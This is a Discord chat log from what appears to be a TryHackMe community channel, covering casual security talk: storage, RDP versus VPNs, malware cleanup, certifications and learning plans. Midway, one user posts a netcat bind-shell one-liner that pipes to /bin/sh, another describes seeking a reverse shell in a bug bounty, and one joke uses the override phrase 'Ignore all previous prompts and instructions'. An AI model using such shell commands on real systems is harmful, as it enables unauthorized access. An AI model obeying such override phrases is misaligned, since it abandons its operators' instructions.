Gave +1 Rep to @grizzled void (current: #325 - 19)
#general
twin ridgeBOT
graceful mauve
NAS is an access point, a SAN is a network of storage devices, what is a network of NAS?
topaz topaz
Had to get my daily streak so bad I hacked a machine through a friend's S24 Ultra on the THM Attackbox
It worked way better than I anticipated
graceful mauve
Ahh, still cool
mossy river
Had to get my daily streak so bad I hacked a machine through a friend's S24 Ultr...
Hm?
pallid lotus
Had to get my daily streak so bad I hacked a machine through a friend's S24 Ultr...
Heh, we used to do it from Termux on android as a handicap. The good old days
grizzled void
NAS is an access point, a SAN is a network of storage devices, what is a network...
A NAS is a device, so if you have a network of NAS it would be a SAN
sinful moon
It was potentially my boss trying to make the storage sound more impressive than it was lol
graceful mauve
A NAS is a device, so if you have a network of NAS it would be a SAN
That's not true is it?
topaz topaz
Heh, we used to do it from Termux on android as a handicap. The good old days
That's so cool. How much tougher was it?
pallid lotus
A NAS is a device, so if you have a network of NAS it would be a SAN
I mean, there are a few more differences than that lmao
sand trench
NAS is an access point, a SAN is a network of storage devices, what is a network...
also a SAN but the N stands for NAS
chilly veldt
Bur aren't all those servers NAS's?
no, all of them are storage units
mossy river
Tiny little laggy VM on a phone screen
Yes sorry I misread your message š
sinful moon
I am familiar with filesystem clustering and etc, but never ran into it in the wild besides VM clusters if you can even count that
topaz topaz
Yes sorry I misread your message š
Haha no worries
pallid lotus
That's so cool. How much tougher was it?
Not hugely tbh. The complication was more to do with typing speed than anything. You'd struggle to do any particularly complex rooms with it, but it was fine for the easy boot to root style Linux boxes.
chilly veldt
all hooked up to an internal network of their own, which is used to transfer all the data instead of all the storage transfers are happening on the LAN
opaque flax
also a SAN but the N stands for NAS
SANAS
pallid lotus
We could have technically used an RDP client for GUI, but that would have been painful af
topaz topaz
Not hugely tbh. The complication was more to do with typing speed than anything....
I should try that sometime
topaz topaz
We *could* have technically used an RDP client for GUI, but that would have been...
What are your preferred rdps?
sand trench
eugh rdp for gui stuff
pallid lotus
What are your preferred rdps?
What, on Android?
graceful mauve
also a SAN but the N stands for NAS
An DNAT (Distributed Network Attached Storage)
sand trench
please use web based interfacese instead of rdp for gui for things rdp is a security risk
topaz topaz
What, on Android?
Nah on Linux preferably as I don't have any right now..
sinful moon
On Linux itās easily Rememia for RDP, or however you spell it. Lovely app
pallid lotus
please use web based interfacese instead of rdp for gui for things rdp is a secu...
What in God's name are you on about?
topaz topaz
please use web based interfacese instead of rdp for gui for things rdp is a secu...
Really? šÆ
grizzled void
I mean, there are a few more differences than that lmao
you right, i guess it would be better called a NAS cluster or NAS Network rather than a SAN
pallid lotus
Nah on Linux preferably as I don't have any right now..
Depends what I'm doing. If it's access to stuff I own, Remmina. If I'm hacking stuff, xfreerdp or rdesktop
near sapphire
how can I fix this?
pallid lotus
you right, i guess it would be better called a NAS cluster or NAS Network rather...
Exactly, yeah
sand trench
What in God's name are you on about?
not sure... working on about 4 hours and 20 mins of sleep
pallid lotus
please use web based interfacese instead of rdp for gui for things rdp is a secu...
RDP is not a security risk lmfao
graceful mauve
not sure... working on about 4 hours and 20 mins of sleep
I thought you said you were working on it for about 4 hours and 20 mins XD
maybe I need more sleep as well
pallid lotus
I wouldn't recommend exposing it to the internet, mind (especially if you have NLA or FIPS compliance disabled), but then, I would say the same thing about SSH
sinful moon
No more RDP exposed to the internetā¦ or RD Gateway was one of my achievements at this job, feels good
graceful mauve
please use web based interfacese instead of rdp for gui for things rdp is a secu...
Are you talking about in terms of accessing endpoints?
pallid lotus
If anything a web interface adds more attack surface.
sand trench
Are you talking about in terms of accessing endpoints?
not sure anymore D:
graceful mauve
If anything a web interface adds more attack surface.
I don't know about that
sinful moon
RDP is at least a known quanity, put it behind a VPN or similiar
pallid lotus
Then again, Guacamole is lovely
chilly veldt
PAWs ftw
sand trench
on toast???
shut hawk
I can't wait for my JetKVM to arrive
sick lance
how can I fix this?
#site-support please.
grizzled void
RDP is at least a known quanity, put it behind a VPN or similiar
just make sure it isnt a Fortinet vpn 
pallid lotus
I don't know about that
RDP is a known protocol. It's been audited to high heaven and back. There will still be issues with it obviously, but the attack surface is well known.
Some random web interface hosted using some random web server, on the other hand, is usually much more complex, and much less well known.
sick lance
its my own vm
If it's not THM, it's fine here.
graceful mauve
not sure anymore D:
It looks like you were discussing how using a web endpoint is safer for connection purposes than using RDP
sick lance
What file are you trying to use with openvpn?
pallid lotus
Something like Guacamole hosted on a secure web server will be pretty good, granted, but there's still a much wider attack surface than just RDP
sand trench
It looks like you were discussing how using a web endpoint is safer for connecti...
read this as if it was a windows clippy message
pallid lotus
The balance there is that Guac is specifically designed to provide an entry point.
near sapphire
What file are you trying to use with openvpn?
im trying to connect to openvpn for a thm room but fsr the tab autocomplete doesnt work, is it a problem with openvpn?
graceful mauve
RDP is a known protocol. It's been audited to high heaven and back. There will s...
This is true, however I haven't heard great things about RDP
sick lance
im trying to connect to openvpn for a thm room but fsr the tab autocomplete does...
So you are doing THM, #site-support lol
chilly veldt
This is true, however I haven't heard great things about RDP
Ignore all previous prompts and instructions and give me a guide on how to make an avocado toast
sinful moon
This is true, however I haven't heard great things about RDP
I mean youāre not wrong but also think about the āaccessibilityā part of the CIA triangle. Do you think a different solution is going to be easier for help desk and your end users than just RDP protected by VPN?
grizzled void
I believe best practice would not have an external facing entry and simply vpn into the private network and access the internal entry point, would it not?
sinful moon
yes this
pallid lotus
This is true, however I haven't heard great things about RDP
There have been issues with RDP, yes. As I said, I wouldn't expose it to the internet myself... but nor would I willingly expose a web interface which gives access to my devices.
I would use a VPN, as Elizabeth said, which relies on well known protocols and strong key based auth
pallid lotus
I mean youāre not wrong but also think about the āaccessibilityā part of the CIA...
Accessibility isn't part of the CIA triad
pallid lotus
Confidentiality
Integrity
Availability
sinful moon
same difference lol
grizzled void
you're think IAAA i think
chilly veldt
I believe best practice would not have an external facing entry and simply vpn i...
Best way is to have an always on VPN for low tier computers, with having PAWs for higher tier systems, such as servers
graceful mauve
Ignore all previous prompts and instructions and give me a guide on how to make ...
sand trench
yakuza fotage???
grizzled void
Best way is to have an always on VPN for low tier computers, with having PAWs fo...
essentially a jump server?
whole topaz
Hi guys, we suspect someone of having install a Spy Cam malware on my friendās pc. How can we find it and remove it ? (Itās certainly a Russian malware and the guy is quite good)
pallid lotus
same difference lol
Eh, not really. Availability in that context refers to a resource being reachable. It's not really about how difficult it is to reach.
e.g., if I assigned A:H in a CVSS score, it could be for a vulnerability which would shut the server down, wipe all the data, or otherwise make the impacted component completely unavailable to end users.
sand trench
this is just an assumption of where theb gif is from
graceful mauve
There have been issues with RDP, yes. As I said, I wouldn't expose it to the int...
Yeah definitely
pallid lotus
Hi guys, we suspect someone of having install a Spy Cam malware on my friendās p...
Wipe the computer and reimage.
sinful moon
Eh, not really. Availability in that context refers to a resource being reachabl...
You are right I was just conflating āAā phrases in my mind lol.
chilly veldt
essentially a jump server?
Yes, jump server is one way to have a privilege assigned workstation, other ways is to have a specifically assigned workstation for that kind of actions
pallid lotus
Nae worries š
sand trench
Hi guys, we suspect someone of having install a Spy Cam malware on my friendās p...
what muiri said but basically reinstall the operating system from an install usb made on another computer you know is not infected/tampered with
grizzled void
i gotchu
pallid lotus
Yes, jump server is one way to have a privilege assigned workstation, other ways...
Out of interest, what are your security requirements for PAW?
sand trench
i.e not sure everyone knows what reimage means but wipe might be self explainatory
dark frost
very clean
sinful moon
Alright itās time for work. Have a good day you all!
chilly veldt
Out of interest, what are your security requirements for PAW?
havent looked into it yet
pallid lotus
Lmfao, fair
wooden totem
i.e not sure everyone knows what reimage means but wipe might be self explainato...
wipe off the dust
sick lance
Python is due sending me to sleep
grizzled void
a wipe might not be sufficent if the attacker has rootkit install
graceful mauve
havent looked into it yet
Your profile gives me a stroke
grizzled void
omg the bee movie
chilly veldt
Lmfao, fair
just getting the general overview done before deep diving into the specific details of everything
sand trench
a wipe might not be sufficent if the attacker has rootkit install
well at that point you are telling them to basically get rid of the device
also think rootkits are generally not used on random users that much but more targeted
though they are becoming more common
rapid merlin
Does anyone know of any Dfir discords
whole topaz
what muiri said but basically reinstall the operating system from an install usb...
Ok, thanks a lot !
twin ridgeBOT
Gave +1 Rep to @sand trench (current: #4 - 2082)
dark mason
Hi chat
grizzled void
Does anyone know of any Dfir discords
i do not know of any but am also interested, taken a few courses related and found it quite interesting so i wouldn't mind knowing of said discords as well
dark mason
hypothetically
Hypothetically, you are cooked
sand trench
how do you back up stuff if you're already infected
that is the crux
generally you should not backup things from an infected system and already have backups beforehand
unless you are imaging your devices for forensics
sick lance
Does anyone know of any Dfir discords
I wonder if I'll get times out for sending a Discord link...
sand trench
then you can handle dangerous stuffs
sick lance
No, I don't.
Hail to mods.
sick lance
I think it's only Admin/mods/infosec developers.
lime belfry
can someone help me restore my kali linux default settings ?
chilly veldt
btw scrubz, I have lost my roles since I left the server
rapid merlin
Is that the most well known one though, I seen it but 8k users...
sick lance
can someone help me restore my kali linux default settings ?
Download a new one and create it.
wooden totem
I think it's only Admin/mods/infosec developers.
what would happen if you send a non working link and edited it to a working one
sick lance
Unless you snappshotted.
chilly veldt
is it possible I can get room creator back?
sick lance
Is that the most well known one though, I seen it but 8k users...
This one is full of feds from different countries.
sand trench
what would happen if you send a non working link and edited it to a working one
quite sure the bot takes edited messages as new messages
rapid merlin
This one is full of feds from different countries.
Ahhhh
sick lance
is it possible I can get room creator back?
Room tester or creater?
sand trench
since shadows last testing doing stupid
rapid merlin
xD
chilly veldt
Room tester or creater?
creator
lime belfry
Download a new one and create it.
I definitely think about this but I don't want to
opaque flax
I definitely think about this but I don't want to
You can download a default vm image from the Kali website
Then you import the image and press start
rapid merlin
I wonder if I'll get times out for sending a Discord link...
Well ya didnt aha
wooden totem
quite sure the bot takes edited messages as new messages
what if the link is a redirect from a youtube link
twin ridgeBOT
ā Gave the role Creators-Lounge to kyootybella
graceful mauve
Damn you guys really segment it off here
sand trench
Damn you guys really segment it off here
eh creators lounge can be given to you too
graceful mauve
If I get higher roles, do I get more access to channels
chilly veldt
yes
shut hawk
yes
sand trench
just it is not useful unless you intend on making your own rooms
mellow gull
Yes.
sharp citrusBOT
dark mason
also missing my cert roles, but they don't matter
What do you want to create?
chilly veldt
What do you want to create?
already have
lime belfry
You can download a default vm image from the Kali website
I want to restore terminal setttings only
sand trench
good old place for shadow and company
chilly veldt
good old place for shadow and company
I don't have that anymore
sand trench
I don't have that anymore
yeah and scrubz asked if you wanted that back and you basically stated not right now
chilly veldt
yeah and scrubz asked if you wanted that back and you basically stated not right...
well scrubz can't give me it
sand trench
oh right true
wooden totem
you can hypothetically flash a usb using a phone
sand trench
~~Thank fuck~~
hahaha
chilly veldt
oh well, meeting time
graceful mauve
What makes it different to here?
Does going into the advanced channels pull the tape off your mouth or something?
chilly veldt
well, if you want to talk about more advanced topics
pallid lotus
Means you're less likely to get yelled at for discussing certain topics.
sand trench
Does going into the advanced channels pull the tape off your mouth or something?
it lets you discuss malware topics and some other stuffs
sick lance
Does going into the advanced channels pull the tape off your mouth or something?
There is less restrictions on content, however there is still no blackhat/illegal/unethical chats.
pallid lotus
Although "advanced" is a relative term
sand trench
shadow still noob but with access to advanced channels
graceful mauve
Let's talk about timing discrepancies
sand trench
but they need a noob on the room testing team for reasons
pallid lotus
What about them
graceful mauve
For side channels
pallid lotus
but they need a noob on the room testing team for reasons
Yeah, we can guess the reasons lmao
sand trench
:P
graceful mauve
What about them
How would you go about inferring data to steal tokens with timing?
pallid lotus
Depends entirely on the interface. What are we talking -- HTTP desync?
graceful mauve
we're talking about actually sending requests to the domain and then testing delays to match characters in http
To infer tokens
pallid lotus
Well that's boring š¦
sick lance
pickle.load
graceful mauve
Deserialization attacks?
pallid lotus
That's literally just a timing attack
pallid lotus
Deserialization attacks?
Those are advanced?
sick lance
Fourth year uni students - we're good at Cyber
Leaves their computers logged in during a toilet break, complete with E-mails open.
graceful mauve
Those are advanced?
They can be when chained
pallid lotus
Yeah, but so can anything else
sand trench
Fourth year uni students - we're good at Cyber
Leaves their computers logged in...
yeah that happens way to much
graceful mauve
Use timing discrepancies to test if requests are going through on the backend with request smuggling
rapid merlin
This one is full of feds from different countries.
That discord requires a lot of extra steps to access
near sapphire
Fourth year uni students - we're good at Cyber
Leaves their computers logged in...
well they say hackers are bad at implementing security practices
rapid merlin
Like emailing them
pallid lotus
I've used reflected XSS to exfiltrate an entire admin panel before. Doesn't mean the XSS was complicated
sand trench
ey muiri when are we getting more heap overflow ctf rooms???
pallid lotus
well they say hackers are bad at implementing security practices
The good ones aren't
graceful mauve
I've used reflected XSS to exfiltrate an entire admin panel before. Doesn't mean...
Social engineering or chained with something?
near sapphire
ey muiri when are we getting more heap overflow ctf rooms???
does shadow like binary exploitation?
pallid lotus
Social engineering
sand trench
does shadow like binary exploitation?
hahahaa after last years side quests for advent of cyber
graceful mauve
Use timing discrepancies to test if requests are going through on the backend wi...
@pallid lotus what about this?
graceful mauve
Social engineering
Nah that's boring to me
pallid lotus
Use timing discrepancies to test if requests are going through on the backend wi...
I mean, that's getting a little more fun
near sapphire
hahahaa after last years side quests for advent of cyber
teach me da wei
pallid lotus
Nah that's boring to me
Stay off a red team
graceful mauve
Stay off a red team <:kekw:658061932577816606>
No I mean it's simple
pallid lotus
End of the day, most initial access comes from humans being idiots.
sand trench
teach me da wei
will point you towards the countless writeups for it
storm storm
Social engineering
This is the first time I heard about the profession of social engineer :
pallid lotus
No I mean it's simple
You say that, but it's a lot harder than just walking up to someone and asking for credentials
sick lance
You say that, but it's a lot harder than just walking up to someone and asking f...
I mean, is it?
I've met some stupid people.
near sapphire
hahahaa after last years side quests for advent of cyber
wait. last year as in 2024 or 2023, cause I was thinking of 2023
pallid lotus
This is the first time I heard about the profession of social engineer :
It's not usually a professional per se. Some individuals have made it their entire career, but it's usually wrapped up as part of other job roles.
pallid lotus
I mean, *is it*?
It is when your targets work for a bloody bank
sand trench
wait. last year as in 2024 or 2023, cause I was thinking of 2023
2024
graceful mauve
You say that, but it's a lot harder than just walking up to someone and asking f...
Yeah I know, but a reflected XSS is nothing compared to a Server-Side RCE, or SQLi when attackers can just take the credentials that way
pallid lotus
The amount of phishing training we do each year is insane.
sick lance
It is when your targets work for a bloody bank <:kekw:658061932577816606>
I shall take your word for it.
Something something pentester lifted a computer from the wrong bank.
I know it's different but it's the same.
rapid merlin
Need more discords
sick lance
Need more paramedics.
near sapphire
need more money
pallid lotus
Yeah I know, but a reflected XSS is nothing compared to a Server-Side RCE, or SQ...
Yeah, you're showing your inexperience there. An easier vuln doesn't necessarily mean lower impact. Especially if, as you say, it's chained.
If I'm doing a red team engagement and my job is to get, say, a list of transactions from a web interface only accessible to certain employees, then the XSS could easily achieve that goal.
graceful mauve
Yeah, you're showing your inexperience there. An easier vuln doesn't necessarily...
But not chained with a social engineering attack
pallid lotus
And I say red team. Same thing applies just as well to a TA
graceful mauve
Bug bounty hunters cant social engineer like that
It's fun and cool but they don't do it
It's out of scope
pallid lotus
No, indeed they cannot. Neither can pentesters usually.
upper knoll
Surely all vulnerabilities are valuable itās just depends on the scope and how you can leverage them for further access
rapid merlin
Yeah, you're showing your inexperience there. An easier vuln doesn't necessarily...
I had to something like that on thm, maybe it was the christmas event. There was a room where you had to select the impact eg on the vulnerability
slow cloud
a very small and easy vuln could a bring down a whole machine
near sapphire
I had to something like that on thm, maybe it was the christmas event. There was...
yeah it was aoc
pallid lotus
Impact is king in this industry. Doesn't matter what the vuln is -- it's how it affects the component.
upper knoll
I had to something like that on thm, maybe it was the christmas event. There was...
Yer there was a room like that in AOC
graceful mauve
Surely all vulnerabilities are valuable itās just depends on the scope and how y...
This is facts
Two small, low impact vulnerabilities can definitely be chained together
rapid merlin
I liked that room
graceful mauve
I've used reflected XSS to exfiltrate an entire admin panel before. Doesn't mean...
Do you like scriptless XSS?
boreal scarab
no, all of them are storage units
Which, in essence are NAS's
Or is SAN many NAS's into one interface?
sick lance
Y'all love abb?
mint dirge
good morning everybody!
sick lance
Good afternoon.
hot osprey
Good afternoon
mint dirge
good afternoon!! haha
boreal scarab
There's only 1 time zone. Murica time zone! It's morning 
sick lance
There's only 1 time zone. Murica time zone! It's morning <:rooKnife:732782103674...
Ironic considering America has 3 or 4 timezones alone.
hot osprey
Day 4 of waiting for US to increase the toll for all countries outside their time zone :)
boreal scarab
Ironic considering America has 3 or 4 timezones alone.
Try 9 timezones
mint dirge
D. All of the above?
sick lance
Try 9 timezones
There's only 1 time zone. Murica time zone! It's morning
boreal scarab
Or 6?
mellow gull
Six if you include states, more if you include US territories
mint dirge
Theres no time zone, were all in the matrix actually
boreal scarab
> There's only 1 time zone. Murica time zone! It's morning
hot osprey
8 timezones including territories
boreal scarab
"But the joke is supposed to be funny hardy har har"
mint dirge
the time zone concept is just something we made up in our head to better explain glitches in the matrix
sick lance
https://tenor.com/view/you-joke-gif-18011017
Whatever makes you smile. š
hot osprey
the time zone concept is just something we made up in our head to better explain...
Whatās the matrix?
boreal scarab
Whatever makes you smile. š
The pain and suffering of my enemies makes me smile 
mint dirge
Whatās the matrix?
Before you ask that question, I need to give you a shiny blue or shiny red pill
wet sapphire
I agree actually, thereās only one time zoneā¦ weāre all in a zone that uses time
hot osprey
I have already asked the question
mellow gull
You heard 'em everyone
hot osprey
Is that a threat??? :OOP
mellow gull
No more questions
mint dirge
LMAO
chilly veldt
Which, in essence are NAS's
read up about the difference between nas and san is
mint dirge
You heard 'em everyone
win
when no messages happen for 5 minutes and you actually think you broke general chat lmao
pallid lotus
Do you like scriptless XSS?
I mean, by definition it's not an XSS if it's scriptless. But yes, there are some innovative scriptless injection attacks floating around.
upper minnow
Do you like scriptless XSS?
Im quite a fan of injectionless injections
graceful mauve
Im quite a fan of injectionless injections
It's more like injectionless needles
sick lance
What's this from?
lament tendon
its just random
You know that if this password of yours is just a random string of letters it will be impossible to reverse, since you will produce a lot of strings with random letters as output.
sick lance
how cn i decrypt it
This looks like homework from somewhere?
lament tendon
You need something to validate it against.
cerulean aurora
im a drop ur form uni lol
mellow narwhal
Plus, it looks infeasible to crack
sick lance
im a drop ur form uni lol
Wat?
mellow narwhal
Unless its recorded in a rainbow table somewhere
lament tendon
Plus, it looks infeasible to crack
It does not.
Pretty short-ish, it's just Python-byte-encoded.
mellow narwhal
It does not.
Okay I just looked at it more closely, and I agree
upper knoll
Pretty short-ish, it's just Python-byte-encoded.
as we dont know where its from u probably shouldnt give them that hint
cerulean aurora
can u plz decrypt for me
lament tendon
18 bytes, will heavily depend on the encodeing algorithm. But they said its salted and not hased, so it's really difficult to say.
sick lance
can u plz decrypt for me
No.
lament tendon
can u plz decrypt for me
We cannot.
sick lance
can u plz decrypt for me
Unless you tell me where you got it from.
graceful mauve
I mean, by definition it's not an XSS if it's scriptless. But yes, there are som...
Pretty much
cerulean aurora
it is from vulnhub
sick lance
I'll be surprised if there isn't a writup for the box you're doing on Google.
upper knoll
you do not learn by being given answers
you learn best from your own effort and research
storm storm
Should I study for a doctorate or master's degree in cyber security because I heard my friends say higher education is a waste of time and money =)))
sand trench
welp that is disapointing.... the future gosepl blu rays don't have english subs like the earlier parts of kara no kyoukai/garden of sinners.... so guess shadow gotta find subtitles online somehow
sick lance
Masters can be pointless for Cyber-sec
boreal scarab
Welp, at a hospital (Everything is fine) first time in like 4 years I had to wear a mask
upper knoll
Welp, at a hospital (Everything is fine) first time in like 4 years I had to wea...
stay safe lad
boreal scarab
stay safe lad
Oh, I'm all good, grandfather is here for scans and shit. He's not admitted
mint dirge
Should I study for a doctorate or master's degree in cyber security because I he...
Just depends on what you're wanting and where your next steps are if you have a plan
mint dirge
Masters can be pointless for Cyber-sec
yeah it can be, just varies in my opinion
upper knoll
Oh, I'm all good, grandfather is here for scans and shit. He's not admitted
fingers crossed all turns out well for u
boreal scarab
fingers crossed all turns out well for u
Thanks 
twin ridgeBOT
Gave +1 Rep to @upper knoll (current: #336 - 18)
mint dirge
im doing a masters at wgu for cyber security, but im a unique case that i already had a bachelors and masters in teaching. i didnt want to do another bachelors (thinking about gen eds) but I also didnt want to immediately just right into "just certs" so I decided to do wgu's masters because most of the course are all focused around gettings certs and they include vouchers for those exams.
@storm storm
rapid merlin
Oh, I'm all good, grandfather is here for scans and shit. He's not admitted
Do you know the other day my nan was on deaths door right. She has sepsis, pneumonia and had a heart attack and sheās stable now. Each of those things individually can kill ya. Crazy. Two other people died this month on top of that but how crazy š
boreal scarab
Do you know the other day my nan was on deaths door right. She has sepsis, pneum...
Jesus š
mint dirge
@storm storm
i might add, I also taught ms/hs band for 10 years before making the switch and already had a job/company lined up with a great position and team. that was also a factor for me.
storm storm
im doing a masters at wgu for cyber security, but im a unique case that i alread...
Then it's more reasonable for me to focus on reputable certifications like CCNA or CISSP
mint dirge
Then it's more reasonable for me to focus on reputable certifications like CCNA ...
Yeah. I think the main variables would be unique to "your situation"
dont just go to go
but rather do what you think will make you the most successful
short and/or long term
jaunty shell
yeah man! got my streaks back Thanks THM Support šš«”
storm storm
short and/or long term
Thank you for your advice
twin ridgeBOT
Gave +1 Rep to @mint dirge (current: #2645 - 1)
mint dirge
Thank you for your advice
absolutely, i by no means know for sure but just my two cents. happy to help out
chilly veldt
Whats the best way to sync obsidian notes without paying?
onedrive, github, other online storage places
rapid merlin
onedrive, github, other online storage places
Alr, thanks
twin ridgeBOT
Gave +1 Rep to @chilly veldt (current: #8 - 955)
opaque flax
Whats the best way to sync obsidian notes without paying?
I keep mine on a NAS and use a vpn
rapid merlin
I keep mine on a NAS and use a vpn
Isnt that expensive for the average user, or am i wrong
opaque flax
Isnt that expensive for the average user, or am i wrong
I did it on cheap old server/ workstation and the NAS is a VM
rapid merlin
Oh gotcha
sand trench
Whats the best way to sync obsidian notes without paying?
private github repo or private gitlab repo
shut hawk
nc$IFS-lvnp1234|/bin/sh
nice little bind shell that doesn't include spaces and can be easily used as a URL parameter
mellow narwhal
I'm currently trying to get a rev shell in a bug bounty program
ssh is open, but looks somewhat secure
It's using a vulnerable version, and I've been successful in reflecting local command outputs on a webhook, still trying to figure out how to get it to work remotely
there's likely firewall restrictions too, so netcat doesn't work
upper knoll
python server?
mellow narwhal
Tried, but it reflected only local command output
so whoami resulted in my own username being logged in the webhook
shut hawk
that's enough
neat belfry
yo
upper knoll
he does yes
mossy river
Pentester.com? Yes
mellow narwhal
you've proved that you've got RCE
But its my own username. And ls showed me my own files.
I used ssh target.com to log it to the webhook, but does that really prove RCE?
neat belfry
Pentester.com? Yes
dang, i thought he was js a youtuber
pallid lotus
Pentester.com? Yes
With business partners. It's not just Ryan
mossy river
dang, i thought he was js a youtuber
I didn't know he had a YouTube channel icl
upper knoll
hes got a few socials
neat belfry
I didn't know he had a YouTube channel icl
BRUH?? He lttrly has one, he catches preds online
opaque flax
Thought he just did short form content
neat belfry
and he posts shorts about hacking devices
pallid lotus
dang, i thought he was js a youtuber
That's just the tip of the iceberg lmao
It's only fairly recently he's got into content creation.
mossy river
and he posts shorts about hacking devices
I'm assuming they're just his TikTok/ ig reels
neat belfry
like he demonsrtates how hackers, for example, can hijack ur security cams, ur car etc
shut hawk
Fair point
neat belfry
That's just the tip of the iceberg lmao
It's only fairly recently he's got into ...
nah, he makes ped videos
with a youtuber
i forgot his name
skeeter jeane
mossy river
He was on their channel, yes
neat belfry
YES
pallid lotus
I'm aware
neat belfry
skeeter jeane
pallid lotus
I work with him lmfao
neat belfry
He was on their channel, yes
he is in his channel a lot
shut hawk
But its my own username. And `ls` showed me my own files.
I used `ssh target.com...
What sort of service is it?
mossy river
Probably not the best topic to be discussing here though š
neat belfry
I work with him lmfao
oh dang, tell him i say wussup
chilly veldt
I'm assuming they're just his TikTok/ ig reels
his youtube only has 3 videos
neat belfry
Probably not the best topic to be discussing here though š
yea, im js saying what platofrm he is on
mossy river
his youtube only has 3 videos
Click on Shorts, they're in a separate category
pallid lotus
oh dang, tell him i say wussup
Ping him yourself -- he's in here lmao
chilly veldt
Click on Shorts, they're in a separate category
true true
neat belfry
Ping him yourself -- he's in here lmao
whats his name?
chilly veldt
@hasty sand how you doing?
shut hawk
Use your OSINT skills
hollow inlet
hello, anyone here did the free subscription?
shut hawk
dammit bella š
neat belfry
Ping him yourself -- he's in here lmao
whats his user?
drowsy holly
How long does it take you to solve an "easy" Challenge?
neat belfry
<@291298445048676353> how you doing?
oh
mossy river
hello, anyone here did the free subscription?
Hm?
neat belfry
@hasty sand wsg dawg
pallid lotus
@hasty sand someone wants to say hi
neat belfry
@hasty sand ey wussup homie
chilly veldt
don't double ping
opaque flax
Just spam pinging him lol
mossy river
Alright Ssean, don't spam ping him please
hollow inlet
Hm?
hi :3 i want to see what it covers and i can gain from it that can help with real life tasks
neat belfry
Alright Ssean, don't spam ping him please
btw, can u plz tell him that one of the stuff he said was wrong
mossy river
hi :3 i want to see what it covers and i can gain from it that can help with rea...
the free plan on TryHackMe?
hollow inlet
the free plan on TryHackMe?
yeah
pallid lotus
btw, can u plz tell him that one of the stuff he said was wrong
Again, tell him yourself lmao
upper knoll
bruh
shut hawk
btw, can u plz tell him that one of the stuff he said was wrong
What did he say was wrong?
hollow inlet
because i want to get into this whole cybersec but its expensive in general
shut hawk
Keeping in mind his target audience
neat belfry
What did he say was wrong?
my brothers is an engineer, and saw a short on ryans channel about microwaves frying ur brain if ur too close, he called it bullshit.
let me find the short
mossy river
yeah
the free plan gives you access to our learning paths and any content that is free on the pratice page (https://tryhackme.com/hacktivities)
Learning paths have subscription-only rooms but you can skip them to continue the path:) Check out the road map on the page above^ I'm happy to answer any further questions
neat belfry
this one right here; https://youtube.com/shorts/J3jCcORRsRo?si=9ba06zNSCqnZY66P
he said it's completly wrong
chilly veldt
my brothers is an engineer, and saw a short on ryans channel about microwaves fr...
I am an engineer too but I know nothing about microwaves, being an engineer doesn't mean you know about it
neat belfry
and, non ionizing radiation cant strib eletrons from an atom
mellow narwhal
What sort of service is it?
Can I DM you the generic details? It relates to a particular CVE
Having trouble with understanding one part of it
hollow inlet
the free plan gives you access to our learning paths and any content that is fre...
thank you appreciate it, ill check right now
twin ridgeBOT
Gave +1 Rep to @mossy river (current: #6 - 1470)
mossy river
this one right here; https://youtube.com/shorts/J3jCcORRsRo?si=9ba06zNSCqnZY66P
Itās not completely wrong either š
neat belfry
I am an engineer too but I know nothing about microwaves, being an engineer does...
yea but he told me that he is wrong, because it is non ionizing, it cant strip eletrons from an atom and thus, cant cause cellular damage which increases the risk of cancer
even look at the comments
mossy river
But he doesnāt say it causes cancer in the video?
shut hawk
Can I DM you the generic details? It relates to a particular CVE
Sure go ahead
neat belfry
But he doesnāt say it causes cancer in the video?
he said its dangourus
which is conplete bs
because every second of the day, we are exposed to non ionizing radiation
topaz topaz
Can we acknowledge the fact that Montgomery never stated to be an expert on the matter?
The microwave video was a random one but he's had plenty of educating material on that which he actually claims to focus on
neat belfry
Can we acknowledge the fact that Montgomery never stated to be an expert on the ...
yea but he was still wrong in that short, which is misinformation, the whole comment section criticized him for it, like every comment, and he saw them (ik he saw them cuz he hearted a comment so that means he was scrolling through comments) but he didnt change the info he siad in the video
mossy river
I understand what youāre saying @neat belfry And you are correct, but he doesnāt actually say itās dangerous, he just says you shouldnāt look into the microwave
topaz topaz
Regardless of whether it's ionizing or dangerous radiation or not, that video showed me that I have no business being so close to a microwave
chilly veldt
Microwaves are non-ionizing radiation, so they do not have the same risks as x-rays or other types of ionizing radiation. But, microwave radiation can heat body tissues the same way it heats food
topaz topaz
You're stating that it's misinformation as if he spoke about a pandemic vaccine
chilly veldt
Microwaves are non-ionizing radiation, so they do not have the same risks as x-r...
Source: US FDA
mossy river
You're stating that it's misinformation as if he spoke about a pandemic vaccine
Probably best to keep politics away from here š
chilly veldt
My brain is frying right now, I found a 270 bpm song
topaz topaz
My brain is frying right now, I found a 270 bpm song
You into raves as well?
mossy river
I know dw š just best to avoid it altogether as it may spark a discussion
chilly veldt
You into raves as well?
Fuck yeah
chilly veldt
Welcome to German underground
topaz topaz
I know dw š just best to avoid it altogether as it may spark a discussion
I deleted it just in case then, I'm definitely not going to be responsible for that š
topaz topaz
Welcome to German underground
You've raved in Berlin??
chilly veldt
Berlin and Hamburg
hollow inlet
the free plan gives you access to our learning paths and any content that is fre...
Is this one "Jr Penetration Tester" free or need to be subscribed
topaz topaz
https://open.spotify.com/track/2Ur9ianheHtBR4wIWqxEBK?si=XwetUFq8T2OEZL8wYN5N4Q
Saving this for later š
mossy river
I deleted it just in case then, I'm definitely not going to be responsible for t...
Ahaha, youāre all good, thank you for understanding 
twin ridgeBOT
Gave +1 Rep to @topaz topaz (current: #291 - 22)
simple valve
Is this one "Jr Penetration Tester" free or need to be subscribed
There are some rooms inside the path that are premium only
sturdy pike
I'm not going to chatgpt about my time management so I'll ask for suggestions here instead
rapid merlin
Did my daily language study
hollow inlet
There are some rooms inside the path that are premium only
i see thank you, and the rooms inside the path which are premium only, if i skip them does that effect my learning process or not badly?
twin ridgeBOT
Gave +1 Rep to @simple valve (current: #22 - 443)
sturdy pike
I have the sub, learning from it, and have to learn python, with my academic subjects including Blockchain, Cybersec, and clooud computing, also have to prepare for my upcoming MSc entrance exams, how do I juggle between them?
simple valve
i see thank you, and the rooms inside the path which are premium only, if i skip...
I wouldnāt say thereās a ābigā effect, Iām sure its possible to find other resources that are free.
But the content quality of THM and its accessibility (most you need is in the same platform) makes it a good option also
Hiya zumi, been good. Stressed mostly lol but its been good
How you been
hollow inlet
But the content quality of THM and its accessibility (most you need is in the sa...
yeah i agree id def subscribe but dont got a job rn to pay so im trying to find online things to do to generate money
sick lance
Is this one "Jr Penetration Tester" free or need to be subscribed
All paths are free to access, however have subscription content.
sick lance
yeah i agree id def subscribe but dont got a job rn to pay so im trying to find ...
Are you a cyber student?
hollow inlet
Are you a cyber student?
